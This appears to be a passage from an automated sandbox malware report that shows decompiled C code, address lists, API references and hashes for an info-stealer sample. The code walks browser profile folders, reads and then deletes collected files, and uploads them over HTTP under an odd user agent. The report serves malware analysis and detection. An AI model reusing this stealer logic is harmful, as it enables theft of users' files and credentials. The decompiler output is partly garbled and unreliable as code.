								_t470 = E0040A503(E0040A503(_t370, _t548), _v28);
								_t373 =  *0x40e22c; // 0x60eda0
								_v136 = _t373;
								_t374 =  *0x40e1e8; // 0x5f5860
								_v132 = _t470;
								_v128 = _t374;
								_v32 = _t470;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t621 = _v12 + 1;
								_v12 = _t621;
							}
							_push(_v64);
							if( *((intOrPtr*)( *0x40e08c))() > 0) {
								_t361 = E0040A503(_v64, _t461);
								_t541 =  *0x40e20c; // 0x5f5700
								_t363 = E0040A503(E0040A503(_t361, _t541), _v16);
								_t543 =  *0x40e20c; // 0x5f5700
								_t470 = E0040A503(E0040A503(_t363, _t543), _v28);
								_t366 =  *0x40e214; // 0x60e718
								_v148 = _t366;
								_t367 =  *0x40e1e8; // 0x5f5860
								_v144 = _t365;
								_v140 = _t367;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t621 = _v12 + 1;
								_v12 = _t621;
							}
							E00403C8F(_a8, _v40,  &_v60, _t470, _v44); // executed
							_t644 = _t648 + 0xc;
							if(_t621 != 0 || _v60 > _t621) {
								_t334 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t336 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t536 = 0x10;
								_t337 = E0040A05F(_t334, _t536);
								_v36 = _t337;
								_t339 =  *((intOrPtr*)( *0x40e13c))(_t336,  *0x40e210);
								_t598 = _v36;
								_t340 = E0040A503(_t339, _t598);
								_v68 = _v68 & 0x00000000;
								_v24 = _t340;
								_t341 =  *0x40e204; // 0x5f5980
								_v72 = _t341;
								_t342 = E00408619( &_v24);
								_v36 = _t342;
								_t623 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
								_t476 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t598, 0xffffffff, 0, 0, 0, 0);
								if(_t476 != 0) {
									_push(0);
									_push(0);
									_push(_t476);
									_push(_t623);
									_push(0xffffffff);
									_push(_t598);
									_push(0);
									_push(0xfde9);
									if( *((intOrPtr*)( *0x40e0e4))() != 0) {
										E00407EDB(_v100, _t623, _v12, _v20, _v60, _v40, _v36,  &_v72); // executed
										_t644 = _t644 + 0x18;
									}
								}
								LocalFree(_t623);
								LocalFree(_v36);
								LocalFree(_v24);
								LocalFree(_t598);
							}
							LocalFree(_v56); // executed
							LocalFree(_v52);
							LocalFree(_v32); // executed
							LocalFree(_v20);
							LocalFree(_v40);
							_t617 = _v88;
							_t589 = _v48;
						}
						LocalFree(_t617);
						_t294 = _v16;
						if(_t294 != 0) {
							LocalFree(_t294);
						}
						_t589 = _t589 + 1;
						_v48 = _t589;
					} while (_t589 < 0x64);
					LocalFree(_t461);
					LocalFree(_v44);
					LocalFree(_v28);
					LocalFree(_v80);
					return _v84;
				}
			}

0x00401e2d
0x00401e30
0x00401e33
0x00401e3c
0x00401e3f
0x00401e46
0x00401e4e
0x00401e55
0x00401e5e
0x00401e65
0x00401e74
0x00401e77
0x00401e9a
0x00401ea3
0x00401ea5
0x00401ea8
0x00000000
0x00401eaa
0x00401ebc
0x00401ec3
0x00401ecc
0x00401ed3
0x00401edc
0x00401ee3
0x00401ee6
0x00401eef
0x00401ef6
0x00401eff
0x00401f06
0x00401f09
0x00401f12
0x00401f14
0x00401f18
0x00401f1c
0x00401f1f
0x00401f2a
0x00401f33
0x00401f3a
0x00401f4d
0x00401f5c
0x00401f61
0x00401f64
0x00401f66
0x004022a7
0x004022aa
0x004022b3
0x004022bc
0x004022c5
0x004022ce
0x004022d7
0x004022dd
0x004022e0
0x004022e2
0x004022e5
0x004022e5
0x00000000
0x00401f6c
0x00401f6f
0x00401f75
0x00401f7e
0x00401f92
0x00401f9e
0x00401faf
0x00401fb2
0x00401fbd
0x00401fc6
0x00401fca
0x00401fce
0x00401fd1
0x00401fd3
0x00401fd5
0x00401fdc
0x00401fe1
0x00401ff3
0x00401ff8
0x00402015
0x00402017
0x0040201e
0x00402023
0x00402026
0x0040202b
0x0040202e
0x00402031
0x00402032
0x00402035
0x00402036
0x00402036
0x00402043
0x00402047
0x0040204b
0x0040204e
0x00402050
0x00402052
0x004020ba
0x00402054
0x00402059
0x0040205e
0x00402070
0x00402075
0x00402093
0x00402095
0x0040209a
0x0040209d
0x004020a2
0x004020a8
0x004020ab
0x004020ae
0x004020af
0x004020b0
0x004020b4
0x004020b5
0x004020b5
0x004020bd
0x004020c6
0x004020c9
0x004020cb
0x004020cd
0x004020d3
0x004020d8
0x004020ea
0x004020ef
0x00402109
0x0040210b
0x00402113
0x00402116
0x0040211b
0x0040211e
0x00402121
0x00402124
0x00402127
0x00402128
0x00402129
0x0040212d
0x0040212d
0x0040212e
0x0040212e
0x00402139
0x0040213b
0x0040213d
0x00402144
0x00402149
0x0040215b
0x00402160
0x0040217a
0x0040217c
0x00402184
0x00402187
0x0040218c
0x0040218f
0x00402192
0x00402195
0x00402196
0x00402197
0x0040219b
0x0040219b
0x0040219c
0x0040219c
0x004021ad
0x004021b2
0x004021b5
0x004021b7
0x004021c2
0x004021cf
0x004021db
0x004021df
0x004021e4
0x004021ef
0x004021f8
0x004021fa
0x00402201
0x00402206
0x0040220d
0x00402210
0x00402215
0x00402218
0x00402222
0x00402230
0x00402246
0x00402248
0x0040224a
0x00402260
0x00402262
0x00402264
0x0040227f
0x00402284
0x00402284
0x00402264
0x00402288
0x00402291
0x0040229a
0x004022a1
0x00000000
0x004021b9
0x004021b9
0x004021bc
0x00000000
0x00000000
0x00000000
0x004021bc
0x004021b7
0x00401e79
0x00401e80
0x004022eb
0x004022eb
0x004022ee
0x004022f1
0x004022fd
0x00402304
0x00402310
0x00402312
0x00402318
0x00402335
0x0040233b
0x0040231a
0x00402327
0x00402329
0x00402329
0x00402343
0x00402356
0x00402358
0x0040235b
0x0040236d
0x0040236f
0x00402376
0x0040237f
0x00402386
0x0040238f
0x00402396
0x0040239f
0x004023a1
0x004023a4
0x004023a8
0x004023b1
0x004023ba
0x004023c1
0x004023ca
0x004023d4
0x004023e3
0x004023e8
0x004023ee
0x004023fd
0x00402411
0x0040241d
0x0040242e
0x00402431
0x0040243c
0x00402445
0x00402449
0x0040244d
0x00402454
0x0040245b
0x00402460
0x00402472
0x00402477
0x00402494
0x00402496
0x0040249d
0x004024a2
0x004024a5
0x004024aa
0x004024ad
0x004024b0
0x004024b1
0x004024b4
0x004024b5
0x004024b5
0x004024c2
0x004024c6
0x004024ca
0x004024d1
0x00402539
0x004024d3
0x004024d8
0x004024dd
0x004024ef
0x004024f4
0x00402512
0x00402514
0x00402519
0x0040251c
0x00402521
0x00402527
0x0040252a
0x0040252d
0x0040252e
0x0040252f
0x00402533
0x00402534
0x00402534
0x0040253c
0x00402544
0x00402545
0x0040254c
0x00402552
0x00402557
0x00402569
0x0040256e
0x00402588
0x0040258a
0x00402595
0x0040259b
0x004025a0
0x004025a6
0x004025a9
0x004025ac
0x004025ad
0x004025ae
0x004025b2
0x004025b3
0x004025b3
0x004025b6
0x004025c2
0x004025c9
0x004025ce
0x004025e0
0x004025e5
0x004025ff
0x00402601
0x0040260c
0x00402612
0x00402617
0x00402620
0x00402626
0x00402627
0x00402628
0x0040262c
0x0040262d
0x0040262d
0x0040263e
0x00402643
0x00402648
0x00402660
0x0040266c
0x00402670
0x00402675
0x00402680
0x00402689
0x0040268b
0x00402692
0x00402697
0x0040269e
0x004026a1
0x004026a6
0x004026a9
0x004026b3
0x004026c1
0x004026d7
0x004026db
0x004026e4
0x004026e5
0x004026e6
0x004026e7
0x004026e8
0x004026ea
0x004026eb
0x004026ec
0x004026f5
0x00402710
0x00402715
0x00402715
0x004026f5
0x00402719
0x00402722
0x0040272b
0x00402732
0x00402732
0x0040273b
0x00402744
0x0040274d
0x00402756
0x0040275f
0x00402765
0x00402768
0x00402768
0x0040276c
0x00402772
0x00402777
0x0040277a
0x0040277a
0x00402780
0x00402781
0x00402784
0x0040278e
0x00402797
0x004027a0
0x004027aa
0x00000000
0x004027b0

APIs

PathCombineW.SHLWAPI(00000000,00000000,Default), ref: 00401E80
wsprintfW.USER32 ref: 00402335
PathCombineW.SHLWAPI(00000000,?,00000000), ref: 00402343
FindFirstFileW.KERNEL32(00000000,?), ref: 00402356
LocalAlloc.KERNEL32(00000040,00200000), ref: 0040236F
LocalAlloc.KERNEL32(00000040,00200000), ref: 0040237F
LocalAlloc.KERNEL32(00000040,00800000), ref: 0040238F
LocalAlloc.KERNEL32(00000040,00400000), ref: 0040239F
lstrlenW.KERNEL32 ref: 00402445
lstrlenW.KERNEL32(?), ref: 00402450
lstrlenW.KERNEL32 ref: 004024C2
lstrlenW.KERNEL32(?), ref: 004024CD

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 00402719
LocalFree.KERNEL32(?), ref: 00402722
LocalFree.KERNEL32(?), ref: 0040272B
LocalFree.KERNEL32(?), ref: 00402732
LocalFree.KERNELBASE(00000000), ref: 0040273B
LocalFree.KERNEL32(?), ref: 00402744
LocalFree.KERNELBASE(?), ref: 0040274D
LocalFree.KERNEL32(00000000), ref: 00402756
LocalFree.KERNEL32(?), ref: 0040275F
LocalFree.KERNEL32(00000000), ref: 0040276C
LocalFree.KERNEL32(?), ref: 0040277A
LocalFree.KERNEL32(00000000), ref: 0040278E
LocalFree.KERNEL32(?), ref: 00402797
LocalFree.KERNEL32(?), ref: 004027A0
LocalFree.KERNEL32(?), ref: 004027AA

Strings

Profile %d, xrefs: 0040232F
`X_, xrefs: 00402026, 0040209D, 00402116, 00402187, 004024A5, 0040251C, 0040259B, 00402612
Default, xrefs: 00401E79, 0040231F
8{@, xrefs: 00401E18

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$lstrlen$Alloc$CombinePath$FileFindFirstGlobalwsprintf
String ID: 8{@$Default$Profile %d$`X_
API String ID: 3768013767-370013379
Opcode ID: 02992f6d9cdce69f396a10d47754d8b27405477d143c7c6195219f0921b13b21
Instruction ID: 449fa844226801038b1647cac7188c5dd728cedc2e0ff5267019116776c59555
Opcode Fuzzy Hash: 02992f6d9cdce69f396a10d47754d8b27405477d143c7c6195219f0921b13b21
Instruction Fuzzy Hash: 30627071E00218AFDF04DFA6DE45AAEBBB5FF88310F10442AF914B7391DB7499118B99

Uniqueness

Uniqueness Score: -1.00%

Function 00407EDB Relevance: 65.2, APIs: 32, Strings: 5, Instructions: 477
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00407EDB(short* __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, LPCWSTR* _a24) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				void _v44;
				void _v48;
				WCHAR* _v52;
				void* _t106;
				void* _t109;
				void* _t112;
				signed int _t113;
				signed int _t115;
				void* _t119;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t128;
				void* _t129;
				void* _t131;
				void* _t132;
				long _t148;
				void* _t164;
				void* _t166;
				long _t168;
				long _t169;
				signed int _t174;
				long _t178;
				void* _t179;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				int _t198;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t223;
				void* _t224;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t229;
				intOrPtr* _t281;
				void* _t282;
				intOrPtr _t285;
				intOrPtr _t286;
				intOrPtr _t288;
				intOrPtr _t293;
				intOrPtr _t294;
				intOrPtr _t296;
				intOrPtr _t297;
				intOrPtr _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				intOrPtr _t303;
				intOrPtr _t306;
				intOrPtr _t308;
				intOrPtr _t309;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr _t315;
				intOrPtr _t317;
				void* _t318;
				signed int _t319;
				void* _t320;
				void* _t321;
				void* _t323;
				void* _t326;
				short* _t327;
				signed short* _t328;
				void* _t329;
				void* _t331;
				WCHAR* _t333;
				void** _t338;
				void* _t339;

				_v20 = __edx;
				_t327 = __ecx; // executed
				_t106 = LocalAlloc(0x40, 0xc350);
				_t281 =  *0x40e044; // 0x74cb5850
				_t224 = _t106;
				_v24 = _t224;
				_t318 =  *_t281(0x40, 0x208);
				_v28 = _t318;
				if( *_t327 != 0x68) {
					L14:
					return 0;
				}
				_t109 = 0x74;
				if( *((intOrPtr*)(_t327 + 2)) != _t109 ||  *((intOrPtr*)(_t327 + 4)) != _t109 ||  *((short*)(_t327 + 6)) != 0x70) {
					goto L14;
				} else {
					_t7 = _t327 + 8; // 0x4589d0ff
					_v32 =  *_t7 & 0x0000ffff;
					_t112 =  *((intOrPtr*)( *0x40e18c))(_t327,  *0x40e3ec);
					_v16 = 0x2f;
					_t282 = 0;
					_t10 = _t112 + 6; // 0x6
					_t328 = _t10;
					_t113 =  *_t328 & 0x0000ffff;
					_t229 = _t113;
					if(_t113 == _v16) {
						L7:
						_t115 =  *((intOrPtr*)( *0x40e08c))(_t318);
						_t319 = _a4;
						_v52 =  &(_t328[_t115]);
						_t119 = LocalAlloc(0x40, _t319 << 0x15); // executed
						_v8 = _t119;
						if(_t319 <= 0) {
							L11:
							_v16 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v8, 0xffffffff, 0, 0, 0, 0);
							_t122 = LocalAlloc(0x40, _t319 << 0x14); // executed
							_t329 = _t122;
							_t123 = LocalAlloc(0x40, _t319 + _a12 << 0x14); // executed
							_v12 = _t123;
							_t320 = _t123;
							_t124 = _v16;
							if(_t124 == 0) {
								L19:
								LocalFree(_v8);
								LocalFree(_t329); // executed
								if(_a12 <= 0) {
									L32:
									_t128 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
									_t285 =  *0x40e3dc; // 0x614c08
									_t129 = E0040A55D(_t128, _t285);
									_t286 =  *0x40e43c; // 0x614ba8
									_t131 = E0040A55D(E0040A55D(_t129, _t286), _v20);
									_t288 =  *0x40e43c; // 0x614ba8
									_t132 = E0040A55D(_t131, _t288);
									_v20 = _t132;
									_push( *((intOrPtr*)( *0x40e198))(_t132) + 1);
									_push(_v20);
									_push(_t320);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _t320 +  *((intOrPtr*)( *0x40e198))(_v20);
									}
									LocalFree(_v20);
									_v44 = 0x927c0;
									_v48 = 0x927c0;
									_t331 =  *((intOrPtr*)( *0x40e124))(L"rqwrwqrqwrqw", 0, 0, 0, 0);
									_v36 = _t331;
									InternetSetOptionW(_t331, 6,  &_v44, 4);
									InternetSetOptionW(_t331, 5,  &_v48, 4);
									if(_t331 == 0) {
										L45:
										_t333 = MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(0) + 1, _t224, 0);
										_v52 = _t333;
										_t148 = _t333 + _t333;
										_v40 = _t148;
										_t321 =  *((intOrPtr*)( *0x40e044))(0x40, _t148);
										if(_t333 != 0) {
											MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(_v52) + 1, _t224, _t321);
											 *((short*)(_v40 + _t321 - 2)) = 0;
										}
										if(_t321 != 0) {
											LocalFree(_t321);
										}
										LocalFree(_v28);
										LocalFree(_t224); // executed
										LocalFree(_v12); // executed
										return 1;
									} else {
										_t162 =  ==  ? 0x1bb : 0;
										_t163 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
										_t164 =  *((intOrPtr*)( *0x40e180))(_t331, _v28, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3, 0, 1);
										_v20 = _t164;
										if(_t164 == 0) {
											L44:
											InternetCloseHandle(_t331);
											goto L45;
										}
										_push(1);
										_v40 = 0xc00000;
										_t248 =  ==  ? _v40 : 0x400000;
										_t166 = HttpOpenRequestW(_t164,  *0x40e25c, _v52, 0, 0, _a24,  ==  ? _v40 : 0x400000, 0x73); // executed
										_t224 = _v24;
										_v52 = _t166;
										if(_t166 == 0) {
											L43:
											InternetCloseHandle(_v20);
											goto L44;
										}
										_t168 = _v12;
										_t169 =  *((intOrPtr*)( *0x40e08c))(_t320 - _t168);
										_t323 = _v52;
										if(HttpSendRequestW(_t323, _a20, _t169, _a20, _t168) == 0) {
											L42:
											InternetCloseHandle(_t323); // executed
											_t331 = _v36;
											goto L43;
										}
										while(1) {
											_push( &_v32);
											_push(0xc350);
											_push(_t224);
											_push(_t323);
											if( *((intOrPtr*)( *0x40e0fc))() == 0) {
												goto L42;
											}
											_t174 = _v32;
											if(_t174 == 0) {
												goto L42;
											}
											 *((char*)(_t224 + _t174)) = 0;
										}
										goto L42;
									}
								}
								_t226 = _a12;
								_t338 = _a16 + 4;
								do {
									_t178 =  *((intOrPtr*)( *0x40e14c))( *_t338, 0);
									_v36 = _t178;
									_t49 = _t178 + 0x400; // 0x400
									_t179 =  *((intOrPtr*)( *0x40e044))(0x40, _t49);
									_t293 =  *0x40e3dc; // 0x614c08
									_t180 = E0040A55D(_t179, _t293);
									_t294 =  *0x40e43c; // 0x614ba8
									_t182 = E0040A55D(E0040A55D(_t180, _t294), _v20);
									_t296 =  *0x40e3dc; // 0x614c08
									_t183 = E0040A55D(_t182, _t296);
									_t297 =  *0x40e444; // 0x610990
									_t186 = E0040A55D(E0040A55D(E0040A55D(_t183, _t297),  *(_t338 - 4)), "\"");
									_t300 =  *0x40e3dc; // 0x614c08
									_t187 = E0040A55D(_t186, _t300);
									_t301 =  *0x40e3f0; // 0x608830
									_t188 = E0040A55D(_t187, _t301);
									_t302 =  *0x40e3dc; // 0x614c08
									_t189 = E0040A55D(_t188, _t302);
									_t303 =  *0x40e3dc; // 0x614c08
									_t190 = E0040A55D(_t189, _t303);
									_v16 = _t190;
									_t191 =  *((intOrPtr*)( *0x40e198))(_t190);
									_v8 = _t191;
									_t54 = _t191 + 1; // 0x1
									_push(_v16);
									_push(_t320);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _t320 + _v8;
										if( *_t338 != 0) {
											_t198 = ReadFile( *_t338, _t320, _v36,  &_v40, 0); // executed
											if(_t198 != 0) {
												_t320 = _t320 + _v40;
											}
											CloseHandle( *_t338);
										}
									}
									if( *(_t338 - 4) != 0) {
										LocalFree( *(_t338 - 4));
									}
									if(_t338[1] != 0) {
										DeleteFileW(_t338[1]); // executed
										LocalFree(_t338[1]);
									}
									LocalFree(_v16);
									_t338 =  &(_t338[4]);
									_t226 = _t226 - 1;
								} while (_t226 != 0);
								_t224 = _v24;
								goto L32;
							}
							_push(0);
							_push(0);
							_push(_t124);
							_push(_t329);
							_push(0xffffffff);
							_push(_v8);
							_push(0);
							_push(0xfde9);
							if( *((intOrPtr*)( *0x40e0e4))() != 0) {
								_push(_t329);
								if( *((intOrPtr*)( *0x40e198))() > 0) {
									_push(_v16);
									_push(_t329);
									_push(_v12);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _v16 - 1 + _v12;
									}
								}
								goto L19;
							}
							LocalFree(_v8);
							LocalFree(_t224);
							LocalFree(_t329);
							LocalFree(_v28);
							goto L14;
						} else {
							_t227 = _a8;
							_v16 = _t319;
							_t326 = _t119;
							do {
								_t209 = E0040A4C2(_v20);
								_t306 =  *0x40e3f8; // 0x5f5960
								_t339 = _t209; // executed
								_t210 = E0040A503(_t326, _t306); // executed
								_t211 = E0040A503(_t210, _t339);
								_t308 =  *0x40e350; // 0x5f5940
								_t212 = E0040A503(_t211, _t308);
								_t309 =  *0x40e340; // 0x616158
								_t215 = E0040A503(E0040A503(E0040A503(_t212, _t309),  *_t227), "\"");
								_t312 =  *0x40e350; // 0x5f5940
								_t216 = E0040A503(_t215, _t312);
								_t313 =  *0x40e35c; // 0x6160f8
								_t217 = E0040A503(_t216, _t313);
								_t314 =  *0x40e350; // 0x5f5940
								_t218 = E0040A503(_t217, _t314);
								_t315 =  *0x40e350; // 0x5f5940
								_t220 = E0040A503(E0040A503(_t218, _t315),  *((intOrPtr*)(_t227 + 4)));
								_t317 =  *0x40e350; // 0x5f5940
								_t326 = E0040A503(_t220, _t317);
								LocalFree(_t339);
								_t25 =  &_v16;
								 *_t25 = _v16 - 1;
								_t227 = _t227 + 0xc;
							} while ( *_t25 != 0);
							_t224 = _v24;
							_v8 = _t326;
							_t319 = _a4;
							goto L11;
						}
					} else {
						_t223 = 0;
						do {
							_t282 = _t282 + 1;
							 *(_t223 + _t318) = _t229;
							_t223 = _t282 + _t282;
							_t229 =  *(_t223 + _t328) & 0x0000ffff;
						} while (_t229 != _v16);
						goto L7;
					}
				}
			}

0x00407ef0
0x00407ef3
0x00407ef5
0x00407ef7
0x00407efd
0x00407f06
0x00407f0f
0x00407f11
0x00407f14
0x004080f3
0x00000000
0x004080f3
0x00407f1c
0x00407f21
0x00000000
0x00407f3c
0x00407f3c
0x00407f46
0x00407f4f
0x00407f51
0x00407f58
0x00407f5a
0x00407f5a
0x00407f5d
0x00407f60
0x00407f66
0x00407f7c
0x00407f82
0x00407f84
0x00407f90
0x00407f9b
0x00407f9d
0x00407fa2
0x00408069
0x0040808f
0x00408092
0x00408097
0x004080a8
0x004080aa
0x004080ad
0x004080af
0x004080b4
0x0040811f
0x00408122
0x00408129
0x00408133
0x00408275
0x00408281
0x00408283
0x0040828b
0x00408290
0x004082a2
0x004082a7
0x004082af
0x004082c1
0x004082c7
0x004082c8
0x004082cb
0x004082d0
0x004082dc
0x004082dc
0x004082e1
0x004082f2
0x004082f5
0x00408304
0x0040830f
0x00408312
0x00408321
0x00408329
0x00408406
0x0040842a
0x0040842c
0x0040842f
0x00408435
0x0040843a
0x0040843e
0x0040845d
0x00408464
0x00408464
0x0040846b
0x0040846e
0x0040846e
0x00408477
0x0040847e
0x00408487
0x00000000
0x0040832f
0x0040834d
0x00408350
0x00408358
0x0040835a
0x0040835f
0x004083ff
0x00408400
0x00000000
0x00408400
0x00408365
0x00408379
0x00408380
0x00408396
0x00408398
0x0040839b
0x004083a0
0x004083f6
0x004083f9
0x00000000
0x004083f9
0x004083a2
0x004083b8
0x004083ba
0x004083c6
0x004083ec
0x004083ed
0x004083f3
0x00000000
0x004083f3
0x004083da
0x004083e2
0x004083e3
0x004083e4
0x004083e5
0x004083ea
0x00000000
0x00000000
0x004083cf
0x004083d4
0x00000000
0x00000000
0x004083d6
0x004083d6
0x00000000
0x004083da
0x00408329
0x0040813c
0x0040813f
0x00408142
0x0040814b
0x00408153
0x00408156
0x0040815f
0x00408161
0x00408169
0x0040816e
0x00408180
0x00408185
0x0040818d
0x00408192
0x004081b0
0x004081b5
0x004081bd
0x004081c2
0x004081ca
0x004081cf
0x004081d7
0x004081dc
0x004081e4
0x004081f0
0x004081f3
0x004081fb
0x004081fe
0x00408202
0x00408205
0x0040820a
0x0040820c
0x00408212
0x00408225
0x00408229
0x0040822b
0x0040822b
0x00408230
0x00408230
0x00408212
0x0040823a
0x0040823f
0x0040823f
0x00408249
0x0040824e
0x00408257
0x00408257
0x00408260
0x00408266
0x00408269
0x00408269
0x00408272
0x00000000
0x00408272
0x004080be
0x004080bf
0x004080c0
0x004080c1
0x004080c2
0x004080c4
0x004080c7
0x004080c8
0x004080d1
0x004080ff
0x00408104
0x00408106
0x0040810e
0x0040810f
0x00408116
0x0040811c
0x0040811c
0x00408116
0x00000000
0x00408104
0x004080d6
0x004080dd
0x004080e4
0x004080ed
0x00000000
0x00407fa8
0x00407fa8
0x00407fab
0x00407fae
0x00407fb0
0x00407fb3
0x00407fb8
0x00407fc0
0x00407fc2
0x00407fcb
0x00407fd0
0x00407fd8
0x00407fdd
0x00407ffa
0x00407fff
0x00408007
0x0040800c
0x00408014
0x00408019
0x00408021
0x00408026
0x00408038
0x0040803d
0x0040804b
0x0040804d
0x00408053
0x00408053
0x00408057
0x00408057
0x00408060
0x00408063
0x00408066
0x00000000
0x00408066
0x00407f68
0x00407f68
0x00407f6a
0x00407f6a
0x00407f6b
0x00407f6f
0x00407f72
0x00407f76
0x00000000
0x00407f6a
0x00407f66

APIs

LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 0040804D
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408092
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080A8
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080D6
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080DD
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080E4
LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 004080ED
LocalFree.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408122
LocalFree.KERNELBASE(00000000,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00408129
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408225
CloseHandle.KERNEL32(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408230
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040823F
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040824E
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 00408257
LocalFree.KERNEL32(0000002F,?,?,?,?,?,00409B89,00000001,?), ref: 00408260
lstrcpyn.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 004082CC
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 004082E1
InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00408312
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00408321
HttpOpenRequestW.WININET(00000000,?,00000000,00000000,00409B89,00C00000,00000001), ref: 00408396
HttpSendRequestW.WININET(?,00000001,00000000), ref: 004083C2
InternetCloseHandle.WININET(?), ref: 004083ED
InternetCloseHandle.WININET(00000000), ref: 004083F9
InternetCloseHandle.WININET(00000000), ref: 00408400
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408422
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001,?,?,?,?,?,00409B89,00000001,?), ref: 0040845D
LocalFree.KERNEL32(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040846E
LocalFree.KERNEL32(00000001,?,?,?,?,?,00409B89,00000001,?), ref: 00408477
LocalFree.KERNELBASE(00000000,?,?,?,?,?,00409B89,00000001,?), ref: 0040847E
LocalFree.KERNELBASE(?,?,?,?,?,?,00409B89,00000001,?), ref: 00408487

Strings

/, xrefs: 00407F51
`Y_, xrefs: 00407FB8
Xaa, xrefs: 00407FDD
@Y_, xrefs: 00407FD0, 00407FFF, 00408019, 00408026, 0040803D
rqwrwqrqwrqw, xrefs: 004082FD

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Internet$AllocCloseHandle$ByteCharFileHttpMultiOptionRequestWide$DeleteOpenReadSendlstrcpyn
String ID: /$@Y_$Xaa$`Y_$rqwrwqrqwrqw
API String ID: 1267997246-228590953
Opcode ID: 9cea2ea35e5a4e3b87f061387e3efcf47fe1870a3cf72bd4b544394dbb92a53b
Instruction ID: 6c99c45f28bfee67641de8d5d70fad00062f969ed25daf8f75b78222567e1072
Opcode Fuzzy Hash: 9cea2ea35e5a4e3b87f061387e3efcf47fe1870a3cf72bd4b544394dbb92a53b
Instruction Fuzzy Hash: 84029F71A00215AFDF04EFB6DE45E6E77B5FB88300F008839E915B7290DB78AD118B68

Uniqueness

Uniqueness Score: -1.00%

Function 00402CB8 Relevance: 51.2, APIs: 22, Strings: 7, Instructions: 440
filestringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E00402CB8(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
